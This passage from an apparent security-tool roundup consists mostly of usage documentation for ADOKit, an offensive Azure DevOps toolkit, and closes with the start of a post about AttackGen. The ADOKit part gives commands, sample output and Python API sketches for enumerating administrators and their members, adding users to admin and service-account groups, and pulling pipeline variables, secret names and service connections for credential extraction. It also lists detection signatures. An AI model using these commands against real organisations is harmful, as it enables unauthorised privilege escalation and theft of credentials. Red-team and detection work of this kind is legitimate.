        Provide the searchgroup module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group.

        ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"

        ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"

        Example Output

        C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"

        ==================================================
        Module: searchgroup
        Auth Type: API Key
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/3/2023 4:48:41 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        UPN | Display Name | Description
        ------------------------------------------------------------------------------------------------------------------------------------------------------------
        [TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
        [ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
        [TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
        [TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
        [MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
        [TestProject2]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
        [YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
        [ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
        [MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
        [YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
        [TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.

        4/3/23 20:48:42 Finished execution of searchgroup

        Get Group Members

        Use Case

        List all group members for a given group

        Syntax

        Provide the getgroupmembers module and the group(s) you would like to search for in the /group: command-line argument, along with any relevant authentication information and URL. This will output the user principal name of each matching group, along with each member of that group, including the member's mail address and display name.

        ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"

        ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"

        Example Output

        C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"

        ==================================================
        Module: getgroupmembers
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 9:11:03 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Group | Mail Address | Display Name
        --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        [TestProject2]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
        [TestProject2]\Build Administrators | user2@YourOrganization.onmicrosoft.com | User 2
        [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
        [MaraudersMap]\Project Administrators | rsmith@YourOrganization.onmicrosoft.com | Ron Smith
        [TestProject2]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
        [TestProject2]\Project Administrators | user2@YourOrganization.onmicrosoft.com | User 2
        [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
        [ProjectWithMultipleRepos]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
        [MaraudersMap]\Build Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins

        4/4/23 13:11:09 Finished execution of getgroupmembers

        Get Project Permissions

        Use Case

        Get a listing of who has permissions to a given project.

        Syntax

        Provide the getpermissions module and the project you would like to search for in the /project: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name, and description for each group that has permissions to the project. Additionally, this will output the group members for each of those groups.

        ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"

        ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"

        Example Output

        C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

        ==================================================
        Module: getpermissions
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 9:11:16 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        UPN | Display Name | Description
        ------------------------------------------------------------------------------------------------------------------------------------------------------------
        [MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
        [MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
        [MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
        [MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
        [MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
        [MaraudersMap]\Readers | Readers | Members of this group have access to the team project.


        [*] INFO: Listing group members for each group that has permissions to this project



        GROUP NAME: [MaraudersMap]\Build Administrators

        Group | Mail Address | Display Name
        --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


        GROUP NAME: [MaraudersMap]\Contributors

        Group | Mail Address | Display Name
        --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        [MaraudersMap]\Contributors | user1@YourOrganization.onmicrosoft.com | User 1
        [MaraudersMap]\Contributors | user2@YourOrganization.onmicrosoft.com | User 2


        GROUP NAME: [MaraudersMap]\MaraudersMap Team

        Group | Mail Address | Display Name
        --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        [MaraudersMap]\MaraudersMap Team | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins


        GROUP NAME: [MaraudersMap]\Project Administrators

        Group | Mail Address | Display Name
        --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins


        GROUP NAME: [MaraudersMap]\Project Valid Users

        Group | Mail Address | Display Name
        --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


        GROUP NAME: [MaraudersMap]\Readers

        Group | Mail Address | Display Name
        --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        [MaraudersMap]\Readers | jsmith@YourOrganization.onmicrosoft.com | John Smith

        4/4/23 13:11:18 Finished execution of getpermissions

        Add Project Admin

        Use Case

        Add a user to the Project Administrators group for a given project.

        Syntax

        Provide the addprojectadmin module along with the /project: and /user: arguments for the user to be added to the Project Administrators group of the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

        ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

        ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

        Example Output

        C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

        ==================================================
        Module: addprojectadmin
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 2:52:45 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.

        [+] SUCCESS: User successfully added

        Group | Mail Address | Display Name
        ----------------------------------------------------------------------------------------------------------------------------------------------------------------
        [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
        [MaraudersMap]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1

        4/4/23 18:52:47 Finished execution of addprojectadmin
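Group membership changes like this go through the Azure DevOps Graph REST API, which lives on the vssps.dev.azure.com host and models a membership as a (subject descriptor, container descriptor) pair: PUT adds the subject to the container, DELETE removes it. A sketch of the URL construction only (the descriptor values and exact api-version are assumptions to verify against the REST reference):

```python
def membership_url(org: str, subject_descriptor: str, container_descriptor: str) -> str:
    # subject_descriptor identifies the user, container_descriptor the group
    # (e.g. a project's Project Administrators group); Graph endpoints are
    # hosted on vssps.dev.azure.com rather than dev.azure.com.
    return (
        f"https://vssps.dev.azure.com/{org}/_apis/graph/memberships/"
        f"{subject_descriptor}/{container_descriptor}?api-version=7.1-preview.1"
    )
```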

        Remove Project Admin

        Use Case

        Remove a user from the Project Administrators group for a given project.

        Syntax

        Provide the removeprojectadmin module along with the /project: and /user: arguments for the user to be removed from the Project Administrators group of the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

        ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

        ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

        Example Output

        C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

        ==================================================
        Module: removeprojectadmin
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 3:19:43 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.

        [+] SUCCESS: User successfully removed

        Group | Mail Address | Display Name
        ----------------------------------------------------------------------------------------------------------------------------------------------------------------
        [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins

        4/4/23 19:19:44 Finished execution of removeprojectadmin

        Add Build Admin

        Use Case

        Add a user to the Build Administrators group for a given project.

        Syntax

        Provide the addbuildadmin module along with the /project: and /user: arguments for the user to be added to the Build Administrators group of the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

        ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

        ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

        Example Output

        C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

        ==================================================
        Module: addbuildadmin
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 3:41:51 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.

        [+] SUCCESS: User successfully added

        Group | Mail Address | Display Name
        ----------------------------------------------------------------------------------------------------------------------------------------------------------------
        [MaraudersMap]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1

        4/4/23 19:41:55 Finished execution of addbuildadmin

        Remove Build Admin

        Use Case

        Remove a user from the Build Administrators group for a given project.

        Syntax

        Provide the removebuildadmin module along with the /project: and /user: arguments for the user to be removed from the Build Administrators group of the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

        ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

        ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

        Example Output

        C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

        ==================================================
        Module: removebuildadmin
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 3:42:10 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.

        [+] SUCCESS: User successfully removed

        Group | Mail Address | Display Name
        ----------------------------------------------------------------------------------------------------------------------------------------------------------------

        4/4/23 19:42:11 Finished execution of removebuildadmin

        Add Collection Admin

        Use Case

        Add a user to the Project Collection Administrators group.

        Syntax

        Provide the addcollectionadmin module along with the /user: argument for the user to be added to the Project Collection Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

        ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

        ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

        Example Output

        C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

        ==================================================
        Module: addcollectionadmin
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 4:04:40 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to add user1 to the Project Collection Administrators group.

        [+] SUCCESS: User successfully added

        Group | Mail Address | Display Name
        ----------------------------------------------------------------------------------------------------------------------------------------------------------------
        [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
        [YourOrganization]\Project Collection Administrators | user1@YourOrganization.onmicrosoft.com | User 1

        4/4/23 20:04:43 Finished execution of addcollectionadmin

        Remove Collection Admin

        Use Case

        Remove a user from the Project Collection Administrators group.

        Syntax

        Provide the removecollectionadmin module along with the /user: argument for the user to be removed from the Project Collection Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

        ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

        ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

        Example Output

        C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

        ==================================================
        Module: removecollectionadmin
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 4:10:35 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to remove user1 from the Project Collection Administrators group.

        [+] SUCCESS: User successfully removed

        Group | Mail Address | Display Name
        ----------------------------------------------------------------------------------------------------------------------------------------------------------------
        [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith

        4/4/23 20:10:38 Finished execution of removecollectionadmin

        Add Collection Build Admin

        Use Case

        Add a user to the Project Collection Build Administrators group.

        Syntax

        Provide the addcollectionbuildadmin module along with the /user: argument for the user to be added to the Project Collection Build Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

        ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

        ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

        Example Output

        C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

        ==================================================
        Module: addcollectionbuildadmin
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/5/2023 8:21:39 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.

        [+] SUCCESS: User successfully added

        Group | Mail Address | Display Name
        ----------------------------------------------------------------------------------------------------------------------------------------------------------------
        [YourOrganization]\Project Collection Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1

        4/5/23 12:21:42 Finished execution of addcollectionbuildadmin

        Remove Collection Build Admin

        Use Case

        Remove a user from the Project Collection Build Administrators group.

        Syntax

        Provide the removecollectionbuildadmin module along with the /user: argument for the user to be removed from the Project Collection Build Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

        ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

        ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

        Example Output

        C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

        ==================================================
        Module: removecollectionbuildadmin
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/5/2023 8:21:59 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.

        [+] SUCCESS: User successfully removed

        Group | Mail Address | Display Name
        ----------------------------------------------------------------------------------------------------------------------------------------------------------------

        4/5/23 12:22:02 Finished execution of removecollectionbuildadmin

        Add Collection Build Service Account

        Use Case

        Add a user to the Project Collection Build Service Accounts group.

        Syntax

        Provide the addcollectionbuildsvc module along with the /user: argument for the user to be added to the Project Collection Build Service Accounts group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

        ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

        ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

        Example Output

        C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

        ==================================================
        Module: addcollectionbuildsvc
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/5/2023 8:22:13 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.

        [+] SUCCESS: User successfully added

        Group | Mail Address | Display Name
        ----------------------------------------------------------------------------------------------------------------------------------------------------------------
        [YourOrganization]\Project Collection Build Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1

        4/5/23 12:22:15 Finished execution of addcollectionbuildsvc

        Remove Collection Build Service Account

        Use Case

        Remove a user from the Project Collection Build Service Accounts group.

        Syntax

        Provide the removecollectionbuildsvc module along with the /user: argument for the user to be removed from the Project Collection Build Service Accounts group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

        ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

        ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

        Example Output

        C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

        ==================================================
        Module: removecollectionbuildsvc
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/5/2023 8:22:27 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.

        [+] SUCCESS: User successfully removed

        Group | Mail Address | Display Name
        ----------------------------------------------------------------------------------------------------------------------------------------------------------------

        4/5/23 12:22:28 Finished execution of removecollectionbuildsvc

        Add Collection Service Account

        Use Case

        Add a user to the Project Collection Service Accounts group.

        Syntax

        Provide the addcollectionsvc module along with the /user: argument for the user to be added to the Project Collection Service Accounts group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

        ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

        ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

        Example Output

        C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

        ==================================================
        Module: addcollectionsvc
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/5/2023 11:21:01 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.

        [+] SUCCESS: User successfully added

        Group | Mail Address | Display Name
        ----------------------------------------------------------------------------------------------------------------------------------------------------------------
        [YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
        [YourOrganization]\Project Collection Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1

        4/5/23 15:21:04 Finished execution of addcollectionsvc

        Remove Collection Service Account

        Use Case

        Remove a user from the Project Collection Service Accounts group.

        Syntax

        Provide the removecollectionsvc module along with the /user: argument for the user to be removed from the Project Collection Service Accounts group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

        ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

        ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

        Example Output

        C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

        ==================================================
        Module: removecollectionsvc
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/5/2023 11:21:43 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.

        [+] SUCCESS: User successfully removed

        Group | Mail Address | Display Name
        ----------------------------------------------------------------------------------------------------------------------------------------------------------------
        [YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith

        4/5/23 15:21:44 Finished execution of removecollectionsvc

        Get Pipeline Variables

        Use Case

        Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.

        Syntax

        Provide the getpipelinevars module along with a /project: argument naming the project from which to extract pipeline variables. To extract pipeline variables from all projects, specify all in the /project: argument.

        ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

        ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

        ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

        ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

        Example Output

        C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

        ==================================================
        Module: getpipelinevars
        Auth Type: Cookie
        Project: maraudersmap
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/6/2023 12:08:35 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Pipeline Var Name | Pipeline Var Value
        -----------------------------------------------------------------------------------
        credential | P@ssw0rd123!
        url | http://blah/

        4/6/23 16:08:36 Finished execution of getpipelinevars
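Pipeline variables are carried on each build definition object returned by the Build REST API; in the documented response shape, the definition's variables field maps each name to an object with value and isSecret members. Assuming that shape, the plaintext variables shown above can be filtered out of a definition's JSON like this (the helper name is illustrative):

```python
def extract_pipeline_vars(definition: dict) -> dict:
    # Secret variables come back from the API without a value, so only
    # plaintext (non-isSecret) entries are recoverable here.
    plaintext = {}
    for name, meta in definition.get("variables", {}).items():
        if not meta.get("isSecret"):
            plaintext[name] = meta.get("value")
    return plaintext
```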

        Get Pipeline Secrets

        Use Case

        Extract the names of any pipeline secrets being used in project(s), which tells the operator where to attempt secret extraction.

        Syntax

        Provide the getpipelinesecrets module along with a /project: argument naming the project from which to extract the names of any pipeline secrets. To extract pipeline secret names from all projects, specify all in the /project: argument.

        ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

        ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

        ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

        ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

        Example Output

        C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

        ==================================================
        Module: getpipelinesecrets
        Auth Type: Cookie
        Project: maraudersmap
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/10/2023 10:28:37 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Build Secret Name | Build Secret Value
        -----------------------------------------------------
        anotherSecretPass | [HIDDEN]
        secretpass | [HIDDEN]

        4/10/23 14:28:38 Finished execution of getpipelinesecrets
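The [HIDDEN] placeholders reflect how the API behaves: variables flagged isSecret never have their values returned, so only the names can be enumerated remotely. A sketch of that filtering, assuming the Build API's documented variables shape of name mapped to an object with value and isSecret members:

```python
def secret_variable_names(definition: dict) -> list:
    # isSecret variables carry no value in API responses; only their
    # names leak, which is what getpipelinesecrets reports.
    return sorted(
        name
        for name, meta in definition.get("variables", {}).items()
        if meta.get("isSecret")
    )
```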

        Get Service Connections

        Use Case

        List any service connections being used in project(s), which tells the operator where to attempt credential extraction for those service connections.

        Syntax

        Provide the getserviceconnections module along with a /project: argument naming the project whose service connections should be listed. To list service connections from all projects, specify all in the /project: argument.

        ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

        ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

        ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

        ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

        Example Output

        C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

        ==================================================
        Module: getserviceconnections
        Auth Type: Cookie
        Project: maraudersmap
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/11/2023 8:34:16 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Connection Name | Connection Type | ID
        --------------------------------------------------------------------------------------------------------------------------------------------------
        Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
        Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
        Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
        Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382

        4/11/23 12:34:16 Finished execution of getserviceconnections
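Service connections are exposed per project through the service endpoint REST API (a GET against the project's _apis/serviceendpoint/endpoints route). Assuming the usual Azure DevOps list envelope of {"count": N, "value": [...]} with name, type, and id fields on each entry, the Connection Name | Connection Type | ID rows above can be flattened like this:

```python
def service_connection_rows(response: dict) -> list:
    # Each endpoint entry in the "value" array carries the connection's
    # display name, its type (e.g. generic, azurerm), and its GUID.
    return [(e["name"], e["type"], e["id"]) for e in response.get("value", [])]
```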

        Detection

        Below are static signatures for the specific usage of this tool in its default state:

        • Project GUID - {60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
        • See ADOKit Yara Rule in this repo.
        • User Agent String - ADOKit-21e233d4334f9703d1a3a42b6e2efd38
        • See ADOKit Snort Rule in this repo.
        • Microsoft Sentinel Rules
        • ADOKitUsage.json - Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)
        • PersistenceTechniqueWithADOKit.json - Detects the creation of a PAT or SSH key with ADOKit
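Because the default User-Agent string above is static, it can be matched directly in proxy or web-server logs; a minimal sketch:

```python
ADOKIT_UA = "ADOKit-21e233d4334f9703d1a3a42b6e2efd38"

def flag_adokit_requests(log_lines):
    # Flag any log line carrying ADOKit's default User-Agent. Note that a
    # rebuilt or modified copy of the tool can trivially change this string,
    # so this catches only default-state usage.
    return [line for line in log_lines if ADOKIT_UA in line]
```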

        For detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.

        Roadmap

        • Support for Azure DevOps Server

        References

        • https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
        • https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops


        Attackgen - Cybersecurity Incident Response Testing Tool That Leverages The Power Of Large Language Models And The Comprehensive MITRE ATT&CK Framework

        By: Zion3R


        AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.


        Star the Repo

        If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! ⭐

        Features

        • Generates unique incident response scenarios based on chosen threat actor groups.
        • Allows you to specify your organisation's size and industry for a tailored scenario.
        • Displays a detailed list of techniques used by the selected threat actor group as per the MITRE ATT&CK framework.
        • Create custom scenarios based on a selection of ATT&CK techniques.
